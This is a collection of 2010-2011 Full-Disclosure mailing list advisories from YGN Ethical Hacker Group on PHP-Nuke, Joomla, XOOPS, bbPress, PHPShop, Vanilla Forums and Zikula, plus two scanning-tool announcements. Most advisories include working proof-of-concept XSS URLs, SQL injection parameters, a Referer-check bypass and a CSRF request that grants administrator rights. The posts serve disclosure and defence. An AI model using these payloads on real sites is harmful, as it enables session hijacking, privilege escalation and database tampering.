http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP-Nuke 8.x = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability
PHP-Nuke 8.x = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass
Vulnerability
1. OVERVIEW
The PHP-Nuke version 8.x and lower versions are vulnerable to Cross
Site Request Forgery (CSRF) because its Anti-CSRF mechanism (Referer
Check) is found to be broken.
2. BACKGROUND
PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.
3. VULNERABILITY DESCRIPTION
The PHP-Nuke version 8.x and lower versions contain a flaw that allows
a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.
4. VERSIONS AFFECTED
8.0 and lower
Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.
5. PROOF-OF-CONCEPT/EXPLOIT
Consider the following code snippet in /mainfile.php of PHP-Nuke:
//
109 if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
$return = strpos(strtoupper($haystack),
strtoupper($needle), $offset);
if ($return === false) {
return false;
} else {
return true;
}
}
} else {
// But when this is PHP5, we use the original function
function stripos_clone($haystack, $needle, $offset=0) {
$return = stripos($haystack, $needle,
$offset=0);
if ($return === false) {
return false;
} else {
return true;
}
}
128 }
..
206 // Posting from other servers in not allowed
207 // Fix by Quake
208 // Bug found by PeNdEjO
210 if ($_SERVER['REQUEST_METHOD'] == POST) {
if (isset($_SERVER['HTTP_REFERER'])) {
212 if (!stripos_clone($_SERVER['HTTP_REFERER'],
$_SERVER['HTTP_HOST'])) {
die('Posting from another server not
allowed!');
}
} else {
die($posttags);
}
}
//
It is clear that stripos_clone checks HTTP_REFERER value whether it
matches the target domain or not.
Attacker can easily bypass it by creating victim domain name under his
web root folder like:
http://attacker.in/victim.com/
From there, he could effectively perform CSRF attacks against php-Nuke users.
A short P0C demo video can be seen at
http://yehg.net/lab/pr0js/training/view/misc/PHPNuke_8x_Anti-CSRF-Bypass/
6. SOLUTION
Not Available.
Use of this product is NOT recommended because of long lack of update
and vendor negligence about security reports.
7. VENDOR
PHP-Nuke Developers
http://phpnuke.org/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_request_forgery
CSRF Wiki:
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke
[Full-disclosure] PHP-Nuke 8.x = Cross Site Scripting Vulnerability
PHP-Nuke 8.x = Cross Site Scripting Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referrers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. 3. VULNERABILITY DESCRIPTION The sender_name and the sender_email parameter are not properly sanitized upon submission to the /modules.php?name=Feedback, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 8.0 and lower Tested version: 8.0 The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well. 5. PROOF-OF-CONCEPT/EXPLOIT Parameter: sender_name [REQUEST] POST /phpnuke/modules.php?name=Feedback HTTP/1.1 Host: attacker.in Referer: http://attacker.in/phpnuke/modules.php?name=Feedback sender_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_email=message=opi=dssubmit=Send [/REQUEST] - Parameter: sender_email [REQUEST] POST /phpnuke/modules.php?name=Feedback HTTP/1.1 Host: attacker.in Referer: http://attacker.in/phpnuke/modules.php?name=Feedback sender_email=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_name=message=opi=dssubmit=Send [/REQUEST] 6. SOLUTION Not Available. Use of this product is NOT recommended because of long lack of update and vendor negligence about security reports. 7. VENDOR PHP-Nuke Developers http://phpnuke.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-01: contacted author through emails 2011-01-25: contacted author through web site contact form 2010-03-23: no replies from author 2010-03-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_scripting About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke php-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658 CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2010-03-23] keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, xss - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability
Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability 1. OVERVIEW Joomla! 1.6.0 is vulnerable to Full Path Disclosure. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Direct access to a library file was not protected, which causes revealing the full internal path of a server whose PHP setting is set to show errors. 4. VERSION AFFECTED Joomla! 1.6.0 5. PROOF-OF-CONCEPT/EXPLOIT http://attacker.in/joomla160/libraries/phpmailer/language/phpmailer.lang-joomla.php 6. SOLUTION Upgrade to Joomla! 1.6.1 or higher 7. VENDOR Joomla! Developer Team http://www.joomla.org 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-24: notified vendor 2011-03-08: vendor released fix 2011-03-23: vulnerability disclosed 10. REFERENCES Vendor Advisory URL: http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_full_path_disclosure inspathx signature: http://code.google.com/p/inspathx/source/browse/trunk/paths_vuln/joomla-1.6.0 WASC-13: http://projects.webappsec.org/w/page/13246936/Information-Leakage CWE-200: http://cwe.mitre.org/data/definitions/200.html #yehg [2011-03-23] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XOOPS 2.5.0 = Cross Site Scripting Vulnerability
XOOPS 2.5.0 = Cross Site Scripting Vulnerability 1. OVERVIEW The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting. 2. BACKGROUND XOOPS is an acronym of eXtensible Object Oriented Portal System. It's the #1 Content Management System (CMS) project on www.sourceforge.net and a recipient of several awards, and constantly places as finalist in various CMS and Open Source competitions. It incorporates many modules such as forums, photo galleries, calendars, article management etc. 3. VULNERABILITY DESCRIPTION Several parameters such as module/module[], memberslist_id[], newname[], oldname[] were not properly sanitized upon submission to the /modules/system/admin.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED XOOPS 2.5.0 and lower 5. PROOF-OF-CONCEPT/EXPLOIT Parameter: module http://attacker.in/xoops/modules/system/admin.php?fct=modulesadminop=installmodule=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe Parameter: module[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1scriptalert(1)/scriptsubmit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=System [/REQUEST] Parameter: memberslist_id[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=usersselgroups=2 Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 94 memberslist_id%5b%5d=scriptalert(1)/scriptop=action_groupSubmit=selgroups=1fct=mailusersedit_group=add_group [/REQUEST] Parameter: newname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=Systemscriptalert(1)/script [/REQUEST] Parameter: oldname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemscriptalert(1)/script1bf8581e3dcfct=modulesadminnewname%5b1%5d=System [/REQUEST] 6. SOLUTION Upgrade to XOOPS 2.5.1 or higher 7. VENDOR XOOPS Development Team http://xoops.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-10: notified vendor 2011-03-16: vendor released fixed version 2011-03-18: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting Vendor Announcement: http://xoops.org/modules/news/article.php?storyid=5851 What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-03-18] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] bbPress 1.0.2 = Cross Site Scripting Vulnerability
= bbPress 1.0.2 = Cross Site Scripting Vulnerability = 1. OVERVIEW bbPress 1.0.2 and lower versions were vulnerable to Cross Site Scripting. 2. APPLICATION DESCRIPTION bbPress is plain and simple forum software, plain and simple with a twist from the creators of WordPress. It is focused on web standards, ease of use, ease of integration, and speed. 3. VULNERABILITY DESCRIPTION The Query String was not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. If a user has already logged in to the application, an XSS attack will execute promptly. If not, it will execute after the user's successful logging in. 4. VERSIONS AFFECTED bbPress 1.0.2 and lower 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/bb-login.php?re=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiWFNTXG4iK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4%3D 6. SOLUTION Upgrade to 1.0.3 or higher 7. VENDOR bbPress Development Team http://bbpress.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-23: notified vendor 2011-02-24: vendor released fixed version 2011-03-13: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[bbpress-1.0.2]_cross_site_scripting About bbPress: http://bbpress.org/about/ #yehg [2011-03-13] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [new tool announcement] host-extract
Host-Extract | Host/IP Pattern Extractor === category: /pentest/enumeration/www useful area: blackbox testing This little ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. With it, you can quickly identify internal IPs/Hostnames, development IPs/ports, cdn, load balancers, additional attack entries related to your target that are revealed in inline js, css, html comment areas and js/css files. This is unlike web crawler which looks for new links only in anchor tags (a) or the like. In some cases, host-extract may give you false positives when there are some words like - main-site_ver_10.2.1.3.swf. With -v option, you can ask the tool to output html view-source snippets for each IP/Domain extracted. This will shorten your manual analysis time. Please go to http://host-extract.googlecode.com/ for more info. Download/Update == svn co http://host-extract.googlecode.com/svn/trunk/ host-extract Tutorial Wiki == Sebastien Damaye from aldeid.com has prepared a thorough host-extract tutorial with real-world famous web sites. http://aldeid.com/index.php/Host-extract Bugs/Suggestions Report === Please report bugs/suggestions to host-extract at yehg.net. Thanks for your contribution. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
== Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability == 1. OVERVIEW Joomla! 1.6.0 was vulnerable to Cross Site Scripting. 2. PRODUCT DESCRIPTION Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION The Query String parameter was not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSION AFFECTED Joomla! 1.6.0 5. PROOF-OF-CONCEPT/EXPLOIT SEO-enabled Joomla 1.6.0 http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1 http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1 SEO-disabled Joomla 1.6.0 http://attacker.in/joomla160x/index.php?option=com_weblinksview=categoryid=18Itemid=227a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1 http://attacker.in/joomla160x/index.php?option=com_contentview=categorylayout=blogid=21Itemid=268%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS This is the exactly same variant as shown in our last year demo video in 1.5.20: http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/ We thought Joomla! team would fix this issue in 1.6.0 stable release whilst they fixed it in Joomla! 1.5.21! 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION Upgrade to Joomla! 1.6.1 or higher 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-01-24: notified vendor 2011-03-08: vendor released fix 2011-03-14: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS) Former Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS) XSS FAQ: http://www.cgisecurity.com/xss-faq.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-03-14] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.6.0 | SQL Injection Vulnerability
= Joomla! 1.6.0 | SQL Injection Vulnerability = 1. OVERVIEW Joomla! 1.6.0 was vulnerable to SQL Injection. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Parameters (filter_order, filer_order_Dir) were not properly sanitized in Joomla! that lead to SQL Injection vulnerability. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSION AFFECTED Joomla! 1.6.0 5. PROOF-OF-CONCEPT/EXPLOIT http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.aAAA,filter_order_Dir=2limit=3limitstart=4 http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,filter_order_Dir=yehg.net.,limit=3limitstart=4 This is the exact same variant as shown in Joomla! 1.5.21: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5_21]_sql_injection We thought Joomla! team would fix this issue in 1.6.0 stable release whilst they fixed it in Joomla! 1.5.22! 6. SOLUTION Upgrade to Joomla! 1.6.1 or higher 7. VENDOR Joomla! Developer Team http://www.joomla.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-24: notified vendor 2011-03-08: vendor released fix 2011-03-14: vulnerability disclosed 10. REFERENCES Vendor Advisory URL: http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_sql_injection OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-89: http://cwe.mitre.org/data/definitions/89.html #yehg [2011-03-14] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHPShop 0.8.1 = | Cross Site Scripting Vulnerability
PHPShop 0.8.1 = | Cross Site Scripting Vulnerability 1. OVERVIEW The PHPShop 0.8.1 and lower versions are currently vulnerable to Cross Site Scripting. 2. BACKGROUND PHPShop is a PHP-powered shopping cart application. It is released under the GNU General Public License. The primary purpose of PHPShop is to provide a simple shopping cart solution that is easy to customize to suit any purpose. PHPShop has less features that many other shopping cart applications, but is generally easier to customize. 3. VULNERABILITY DESCRIPTION The Query String was not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED PHP 0.8.1 = 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/phpshop0_8_1/?page=store/XSS%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1 6. SOLUTION The vendor has discontinued this product. It is recommended that an alternate software package be used in its place. 7. VENDOR PHPShop Development Team http://phpshop.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-02-25: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[phpshop_0.8.1]_cross_site_scripting Project Home: http://code.google.com/p/phpshop/, http://sourceforge.net/projects/phpshop/ PHPShop Download Stats: http://sourceforge.net/projects/phpshop/files/phpshop/0.8.1/stats/timeline?dates=2010-01-01+to+2010-01-01 XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-02-25] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vanilla Forums 2.0.17.1 ~ 2.0.17.5 = Cross Site Scripting Vulnerability
1. OVERVIEW The Vanilla Forums 2.0.17.1 till 2.0.17.5 were vulnerable to Cross Site Scripting. 2. BACKGROUND Vanilla Forums are open-source, standards-compliant, customizable discussion forums. It is specially made to help small communities grow larger through SEO mojo, totally customizable social tools, and great user experience. Vanilla is also built with integration at the forefront, so it can seamlessly integrate with your existing website, blog, or custom-built application. 3. VULNERABILITY DESCRIPTION The 'p' parameter was not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 2.0.17.1 ~ 2.0.17.5 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/vanilla/index.php?p=/entry/;scriptalert(/XSS/)/script 6. SOLUTION Upgrade to Vanilla Forums 2.0.17.6 or higher 7. VENDOR Vanilla Forums Development Team http://vanillaforums.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-01-25: notified vendor 2011-01-27: vendor released fix 2011-02-22: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.17.5]_cross_site_scripting Github Issue Report: https://github.com/vanillaforums/Garden/issuesearch?state=closedq=xss#issue/750 Vendor Commit: https://github.com/vanillaforums/Garden/commit/0a22506c76ac419d390d5d1bde5ec5f48b195358 Vendor Release: http://vanillaforums.org/discussion/14397/vanilla-2.0.17-released/ XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-02-22] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Zikula CMS 1.2.4 = Cross Site Request Forgery (CSRF) Vulnerability
Zikula CMS 1.2.4 = Cross Site Request Forgery (CSRF) Vulnerability 1. OVERVIEW The Zikula 1.2.4 and lower versions were vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND Zikula is a Web Application Toolkit, which allows you to run impressive websites and build powerful online applications. Zikula has received praise for many things, but we belive the highlights are ease of use, quick and easy development, security and performance and lastly flexibility. 3. VULNERABILITY DESCRIPTION Zikula CMS 1.2.4 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 1.2.4 = 5. PROOF-OF-CONCEPT/EXPLOIT The following request escalates a normal user to an administrator. [REQUEST] POST /zikula/index.php?module=userstype=adminfunc=processusersop=edit HTTP/1.1 authid=userid=3do=yesaccess_permissions%5B%5D=2access_permissions%5B%5D=1uname=testeremail=tester%40yehg.netpass=vpass=activated=1theme=submit= [/REQUEST] 6. SOLUTION Upgrade to Zikula 1.2.5 or higher 7. VENDOR Zikula Foundation http://zikula.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-24: notified vendor 2011-01-25: vendor released fix 2011-02-01: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/ Vendor Released Info: http://community.zikula.org/index.php?module=Newsfunc=displaysid=3041title=zikula-1.2.5-released Zikula 1.2.5 Changlog: http://code.zikula.org/core12/browser/tags/Zikula-1.2.5/src/docs/CHANGELOG CSRF Wiki: https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery #yehg [2011-02-01] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder
Check the update via svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx CHANGELOG === covered remaining checks (empty array, null cookie) in Full_Path_Disclosure (http://www.owasp.org/index.php/Full_Path_Disclosure) of OWASP Application Security Desk Reference (ASDR) Project (http://www.owasp.org/index.php/Category:OWASP_ASDR_Project) added support for generating path definition file and you can now use -d with path-definition file to check in addition to cms directory path added support for reading gzip/deflate compressed response from server added regexp support (use your own regexp rules to search in returned responses in addition to built-in regexp error messages) added null session cookie support --null-cookie [will auto null session for all languages ] added custom headers support --headers cookie: sid[%00]=1\r\nX-pingback:: %00 added data (GET/POST) support --data (var=1var=2) added method (get by default) support --method post added follow redirect support --follow-redirect added cold fusion language support; when feeded by large inputs, cold fusion apps tend to reveal source code disclosure if without boundary checks when used as IIS ISAPI extensions added --rm option to remove directory used to generate path list [suggestion by Brendan Coles] cleaned *-vuln-path.txt file content to make it ready for path definition file added support for [] , querystring in path definition file [suggestion by Brendan Coles] Added supported for username and web root path extraction for both *nux and windows [suggestion by Brendan Coles] added detection support for html_errors being set as off in php.ini [suggestion by Sebastien Damaye] THANKS === Ryan Dewhurst (http://www.ethicalhack3r.co.uk) for his suggestion to cover all checks (empty array, null cookie) of http://www.owasp.org/index.php/Full_Path_Disclosure --data, --param-array, -n/--null-session options. Brendan Coles (http://itsecuritysolutions.org/, http://whatweb.net/) for his suggestion that known web application paths should be bundled for convenience and time saving. I've done files with dozens of open-source web app known paths under 'paths' directory. You can do it for your desired CMS/application by -d and -g options. See EXAMPLES for more details. Submit latest path files to inspathx at yehg.net. Sebastien.damaye for his write-up about inspathx tutorial , http://www.aldeid.com/index.php/Inspathx And finally to developers community, their common coding practice, their belief on path disclosure as server side issue that make this tool meaningful and usable for current plus future web apps 100+ Web Apps with Full Path Disclosure using inspathx === https://code.google.com/p/inspathx/source/browse/#svn%2Ftrunk%2Fpaths_vuln * Send bugs/suggestions to inspathx at yehg.net - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vanilla Forums 2.0.16 = Cross Site Scripting Vulnerability
